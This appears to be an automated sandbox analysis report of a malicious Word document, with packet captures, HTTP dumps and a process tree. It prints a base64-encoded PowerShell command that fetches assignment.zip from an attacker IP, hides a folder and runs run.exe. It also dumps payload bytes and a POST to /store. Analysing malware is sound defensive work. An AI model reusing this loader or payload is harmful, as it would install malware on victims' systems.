                                                  Dec 21, 2024 00:13:17.762630939 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.763062954 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.763159990 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.763176918 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.763222933 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.763447046 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.763597965 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.763890028 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.763984919 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.764003992 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.764034033 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.764189959 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.764238119 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.764678001 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.764774084 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.764784098 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.764832020 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.764997959 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.765049934 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.765496016 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.765605927 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.765616894 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.765650034 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.765801907 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.765856981 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.766283035 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.766362906 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.766374111 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.766405106 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.766608000 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.766661882 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.767111063 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.767225027 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.767235994 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.767276049 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.767404079 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.767457008 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.767911911 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.767980099 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.767991066 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.768035889 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.768198013 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.768253088 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.768702984 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.768794060 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.768805981 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.768842936 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.769000053 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.769051075 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.769500971 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.769570112 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.769581079 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.769619942 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.941265106 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.941339016 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.941354990 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.941397905 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.941549063 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.941608906 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.941653013 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.941857100 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.941871881 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.941911936 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.942029953 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.942089081 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.942447901 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.942558050 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.942574024 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.942620993 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.942744017 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.942800045 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.943263054 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.943372965 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.943387985 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.943418026 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.943576097 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.943638086 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.944040060 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.944137096 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.944152117 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.944189072 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.944349051 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.944406033 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.944900990 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.944983959 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.944998980 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.945044994 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.945180893 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.945255041 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.945656061 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.945746899 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.945764065 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.945795059 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.945951939 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.946001053 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.946482897 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.946559906 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.946578026 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.946608067 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.946755886 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.946808100 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.947304964 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.947377920 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.947395086 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.947428942 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.947626114 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.947706938 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.948239088 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.948256016 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.948276043 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.948298931 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.948643923 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.948695898 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.948873043 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.948987007 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.949002981 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.949048996 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.949178934 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.949230909 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.949668884 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.949765921 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.949783087 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.949831963 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.949976921 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.950031042 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.950473070 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.950572968 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.950589895 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.950623989 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.950778961 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.950851917 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.951267958 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.951380014 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.951395035 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.951427937 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.951594114 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.951646090 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:17.952078104 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.952131987 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:17.952182055 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:19.618494987 CET804973891.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:19.618673086 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:20.544692993 CET4973880192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:20.649276018 CET4974780192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:20.768896103 CET804974791.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:20.768984079 CET4974780192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:20.769124985 CET4974780192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:20.769181967 CET4974780192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:20.888669968 CET804974791.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:20.888739109 CET804974791.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:22.117494106 CET804974791.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:22.122554064 CET4974780192.168.2.491.208.206.195
                                                  Dec 21, 2024 00:13:22.242495060 CET804974791.208.206.195192.168.2.4
                                                  Dec 21, 2024 00:13:22.242577076 CET4974780192.168.2.491.208.206.195
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 21, 2024 00:13:22.349267960 CET1.1.1.1192.168.2.40x73d4No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                  • 91.208.206.195
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.44973891.208.206.195807268C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 21, 2024 00:13:12.551276922 CET80OUTGET /d/assignment.zip HTTP/1.1
                                                  Host: 91.208.206.195
                                                  Connection: Keep-Alive
                                                  Dec 21, 2024 00:13:13.905493021 CET1236INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 23:13:13 GMT
                                                  Server: Apache/2.4.62 (Debian)
                                                  Content-Length: 2490070
                                                  Last-Modified: Tue, 03 Dec 2024 21:48:59 GMT
                                                  Content-Disposition: attachment; filename=assignment.zip
                                                  Cache-Control: no-cache
                                                  ETag: "1733262539.037506-2490070-3848998161"
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/zip
                                                  Data Raw: 50 4b 03 04 0a 00 00 00 00 00 e5 85 83 59 4c 44 2a a8 1e fe 25 00 1e fe 25 00 11 00 1c 00 61 73 73 69 67 6e 6d 65 6e 74 28 32 29 2e 7a 69 70 55 54 09 00 03 5d 7c 4f 67 5c 7c 4f 67 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 50 4b 03 04 14 00 00 00 08 00 a6 85 83 59 8a 6e c0 27 7a fd 25 00 6b a9 5d 00 07 00 1c 00 72 75 6e 2e 65 78 65 55 54 09 00 03 e8 7b 4f 67 21 7c 4f 67 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 e4 5a 7b 7c 14 45 b6 ae 99 3c 1c 94 d0 c3 4b a2 f2 18 35 e2 e0 23 93 71 57 4d 50 71 46 42 a8 59 9b 10 25 3c 56 42 08 22 31 f8 80 6c 98 40 54 ae 77 62 66 30 7d db 61 83 02 a2 40 44 84 fd c1 8a 0a 5e d4 80 22 19 02 0c b8 2a 31 cb 2e 0f ef f5 46 7c 75 08 ae c4 bd 62 82 b2 b3 e7 54 75 4f 77 4f 12 58 ef bf 37 3f a5 bb aa be 3a f5 d5 a9 73 4e 9d aa 9e 09 f7 d5 91 24 42 48 32 fc 1f 8b 11 d2 40 f8 9f 87 5c f8 2f 00 ff f7 1b b1 b3 1f d9 de e7 a3 2b 1b 2c e2 47 57 16 96 cd 5d e0 28 af 98 ff 60 c5 ac 47 1d b3 67 cd 9b 37 df ef b8 7f 8e a3 a2 72 9e 63 ee 3c 47 ee c4 49 8e 47 e7 3f 30 27 33 2d ed e2 [TRUNCATED]
                                                  Data Ascii: PKYLD*%%assignment(2).zipUT]|Og\|OguxPKYn'z%k]run.exeUT{Og!|OguxZ{|E<K5#qWMPqFBY%<VB"1l@Twbf0}a@D^"*1.F|ubTuOwOX7?:sN$BH2@\/+,GW](`Gg7rc<GIG?0'3-UF8BXr1Q YGn9MFZ/Z'nBl,D}rV?UN}UPZ'M+V/Y5{$O/#GS{S'1%_en,3+8U<Yql0WRqUW83:;X$\.tNh3c^ckNza{Uydlk*-F0Ch)'SV<F>WB1^xX8RZ=J.Zx' LB;pQeoPy9@$VH+osglHk:vJ>E;g/ZY[',y"uPp+"msF z0;.FRSj7@]i'xUB_1<BG|rJ6NY
                                                  Dec 21, 2024 00:13:13.905742884 CET1236INData Raw: 15 52 6e 86 43 09 bf ee 22 20 63 6f 76 93 ca c3 5b 38 79 ea 94 49 20 d5 41 e5 61 33 41 99 54 be b1 73 6e 1e 71 c7 e6 50 39 f9 9a 2c 46 b5 dc d6 3e 44 e3 9d b3 5f 08 3e 08 4a d8 a1 80 87 c5 fe 42 a5 ce d3 54 d8 f6 2b 1a 6a ac fc 82 ca 37 df 00 22
                                                  Data Ascii: RnC" cov[8yI Aa3ATsnqP9,F>D_>JBT+j7"19"NN-2xfC1!88:I;lfM\Y :68Nu.Ui+<eB?ac4MVhkM@-}*,k?}*-TP}iP0R4
                                                  Dec 21, 2024 00:13:13.905780077 CET1236INData Raw: c0 c4 73 22 e3 89 7f 99 09 f1 40 d3 ef 73 3d da 83 af 61 ca 64 f6 97 e2 6e 81 69 08 cf 9a ad 02 66 77 0e 65 c1 0c 7c aa 69 0c 53 4d 23 89 86 93 3d ff 82 79 ac f8 f1 42 53 79 ae c2 34 95 60 05 b7 67 64 0e e3 5d 4a 65 9f 8d ce 6d 3e 00 ba f2 b2 51
                                                  Data Ascii: s"@s=adnifwe|iSM#=yBSy4`gd]Jem>QZP#'VomE/Ij^SzSwLCXu|,bMSdCm=ps6mo6ni2cowEc<dW5Up:
                                                  Dec 21, 2024 00:13:13.905869007 CET1236INData Raw: 39 15 9d 1a 8e 43 1d b1 66 d0 b6 0d 7b f7 9d 20 e7 d9 51 e2 72 ec 26 4f 2d 80 bd d0 0a a6 b9 78 90 36 fc 34 75 f8 05 00 d8 d9 1a 4f 57 70 88 92 cd dc 67 e8 4a 17 d1 04 8e d1 04 8e 85 c6 f6 ac 5e 48 8e 54 49 be 3e 00 47 9d 08 ee 39 b5 5c f1 26 b1
                                                  Data Ascii: 9Cf{ Qr&O-x64uOWpgJ^HTI>G9\&B)tE$xnGUiKWN\L_V4FJqQyRl.*[km_rBjE_Ns41;q?e1Q#ym7-lD%k*z8|G-1
                                                  Dec 21, 2024 00:13:13.905922890 CET896INData Raw: 94 a3 12 dc 61 f9 5a d3 3a 04 ab 38 2a c1 25 e6 ad 35 ad 4e f0 7e 8e ea c1 2d 72 d7 9a d6 2d 48 39 32 c1 35 86 af 35 ad 66 f0 26 8e 4a 70 8f ce 35 a6 35 0e 0e e5 a8 04 17 69 59 63 5a f9 60 2a 47 f5 e0 26 9b d6 98 6c 22 78 ea 1c 43 9a 5d 45 79 6a
                                                  Data Ascii: aZ:8*%5N~-r-H9255f&Jp55iYcZ`*G&l"xC]Eyj$MhYDxl,wEU@3Z9s/!"] ^YMpXBu!%:dj}*2Cj!u:_C>m3H^zEI}J
                                                  Dec 21, 2024 00:13:13.905958891 CET1236INData Raw: fd 4a f7 ea 59 50 2d cf 84 79 fc bb 1d 9a 07 a9 cd da 39 7a d0 57 d7 f1 32 95 8e e3 0f 4c 0a 3f 65 52 be dd 6e 86 dd 01 d5 78 6d ee c1 6b f3 02 fc d6 94 c5 3f 60 b2 5b ee d8 b1 eb 4c 9f 73 de 28 b9 8e 7d 9a 70 c4 3f 4d 68 97 d7 37 3f 47 48 34 98
                                                  Data Ascii: JYP-y9zW2L?eRnxmk?`[Ls(}p?Mh7?GH4Tfets0[QQ#RI.g\xVRIGUd$t%j?B6DMnC":!@w 8CF""joFP$*Pmq>.sNCw
                                                  Dec 21, 2024 00:13:13.905993938 CET1236INData Raw: 08 f8 88 34 5d 01 25 6d 19 9c 2d 05 be 80 21 57 2d 12 b7 29 9a fa 08 5d 38 ff 72 9e 71 10 94 13 9a 0b 43 75 01 e8 bf d3 28 f3 56 2c 2c e5 3e 0c 88 a2 69 18 14 5b 04 c5 fa 35 6e 00 d4 f3 01 f9 72 ba 61 d0 41 d7 71 e5 6d e9 30 d5 ee 5f 2f 62 49 7f
                                                  Data Ascii: 4]%m-!W-)]8rqCu(V,,>i[5nraAqm0_/bIQs~P_wI4!KY*F^MD7"bOFwq;O`Ls0?jV~y6}".>}2H|H@n}e3F[T
                                                  Dec 21, 2024 00:13:13.906029940 CET448INData Raw: 02 1f ed 1b 2b e9 f8 e8 21 8c 4f ca 60 95 70 76 79 21 3e 3a b9 2c 47 62 4d 49 d9 12 7b 35 49 e0 a3 17 e1 0f 9c 1e cd 5f d5 fe 20 f9 ab ea 18 5e 5c 14 0c ef 54 55 98 71 d6 a3 be 8f bc 0a 3d 57 05 7d 52 cd 77 b1 d5 99 38 0f cf 09 3c 16 e7 5f aa 5b
                                                  Data Ascii: +!O`pvy!>:,GbMI{5I_ ^\TUq=W}Rw8<_[]&_4\lV;\dJjpgHaZU$s9 Ut_D"X-[z$WQVJdee&*1b|z_O\z^5$qreT8
                                                  Dec 21, 2024 00:13:13.906534910 CET1236INData Raw: 23 16 06 79 f0 20 0d b6 2e de 28 20 23 5e bb ca e2 73 e4 9b e2 25 a6 f8 02 53 bc c6 14 df 6c 8a 37 98 e2 07 4c f1 0e 53 bc 2b 9e ae d7 22 5a 62 d1 2e d5 f0 fa 88 06 67 5a 0c 5a a7 29 3e dd 14 9f 6b a1 ba 03 90 b4 00 3a cc 4e f8 1b 76 bc 85 d2 6b
                                                  Data Ascii: #y .( #^s%Sl7LS+"Zb.gZZ)>k:NvkDzHUKSfZ7O1L%Efh<E(U"!R<SN6n4;}&4)0h@b%x;hIH7,l=Vc[V2]yG.K>jl%
                                                  Dec 21, 2024 00:13:13.906570911 CET1236INData Raw: 8e 71 17 bc b9 fc 74 60 b9 55 f7 5f d7 17 0d e5 4d d6 31 29 8b 57 7a 07 fd d6 5d cb 5c 05 ef d8 7c a9 b8 a4 6f c1 75 1e 16 ff e6 38 d2 6b 1d 54 11 38 94 a2 69 a0 bf 09 c5 62 ef 83 52 03 ec 56 a8 73 ed f7 9e f1 32 2f 1a be 29 8f 5a e4 28 af 40 af
                                                  Data Ascii: qt`U_M1)Wz]\|ou8kT8ibRVs2/)Z(@r6;B12W9`Cq!*#[mM`k0?)n]BB_c%?S[`EXrS="Gv\*Ea:|9nU"UUm<v
                                                  Dec 21, 2024 00:13:14.025706053 CET1236INData Raw: da ce e9 b0 76 a4 ab c2 12 21 a4 15 cf 71 34 22 35 6d d4 a3 c6 09 09 9b 1d e4 f5 04 5f 61 fd 1c d0 ae 55 ac 9e 44 5d 97 72 cb 8a 87 8d ae 7b 69 3d 76 dd 47 eb f3 f4 f9 4b 5d f7 75 67 16 f9 55 d3 e9 63 b7 b5 6f eb ac b0 b5 af e2 be 9e d7 b2 f2 59
                                                  Data Ascii: v!q4"5m_aUD]r{i=vGK]ugUcoYen+n5l,v_&ikmUFPx6@|3yZnt8]pP0]'gZ[`.kDe!7:QSd@8,-<F`F


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.44974791.208.206.195807724C:\Users\user\p4yx0rl0s3\run.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 21, 2024 00:13:20.769124985 CET159OUTPOST /store HTTP/1.1
                                                  Host: 91.208.206.195
                                                  User-Agent: ureq/2.10.1
                                                  Accept: */*
                                                  Content-Type: application/json
                                                  accept-encoding: gzip
                                                  Content-Length: 46
                                                  Dec 21, 2024 00:13:20.769181967 CET46OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 32 35 38 33 38 22 2c 22 65 6d 61 69 6c 22 3a 22 33 31 38 39 35 35 36 38 31 33 33 36 35 33 38 37 37 33 36 22 7d
                                                  Data Ascii: {"name":"25838","email":"3189556813365387736"}
                                                  Dec 21, 2024 00:13:22.117494106 CET179INHTTP/1.1 200 OK
                                                  Date: Fri, 20 Dec 2024 23:13:21 GMT
                                                  Server: Apache/2.4.62 (Debian)
                                                  Content-Length: 39
                                                  Content-Type: application/json
                                                  Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 44 61 74 61 20 73 74 6f 72 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 22 7d 0a
                                                  Data Ascii: {"message":"Data stored successfully"}


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:18:13:02
                                                  Start date:20/12/2024
                                                  Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                                  Imagebase:0xdb0000
                                                  File size:1'620'872 bytes
                                                  MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:18:13:08
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgAwADgALgAyADAANgAuADEAOQA1AC8AZAAvAGEAcwBzAGkAZwBuAG0AZQBuAHQALgB6AGkAcAAiADsAJABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJABlAG4AdgA6AHUAcwBlAHIAbgBhAG0AZQBcAHAANAB5AHgAMAByAGwAMABzADMAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAE4AYQBtAGUAIABBAHQAdAByAGkAYgB1AHQAZQBzACAALQBWAGEAbAB1AGUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAEEAdAB0AHIAaQBiAHUAdABlAHMAXQA6ADoASABpAGQAZABlAG4AKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABwAGEAdABoACAAKwAgACIAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAHAAYQB0AGgAXABhAHMAcwBpAGcAbgBtAGUAbgB0AC4AegBpAHAAIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAiACQAcABhAHQAaABcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkAIgA7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgACIAJABwAGEAdABoAFwAYQBzAHMAaQBnAG4AbQBlAG4AdAAoADIAKQBcAGEAcwBzAGkAZwBuAG0AZQBuAHQAKAAyACkALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABwAGEAdABoACIAOwBjAGQAIAAkAHAAYQB0AGgAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgByAHUAbgAuAGUAeABlACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==
                                                  Imagebase:0x220000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:18:13:08
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:18:13:19
                                                  Start date:20/12/2024
                                                  Path:C:\Users\user\p4yx0rl0s3\run.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\p4yx0rl0s3\run.exe"
                                                  Imagebase:0xd30000
                                                  File size:6'138'219 bytes
                                                  MD5 hash:CD860C78E0374DEC3A2B1A73507FCE4A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 65%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:18:13:19
                                                  Start date:20/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
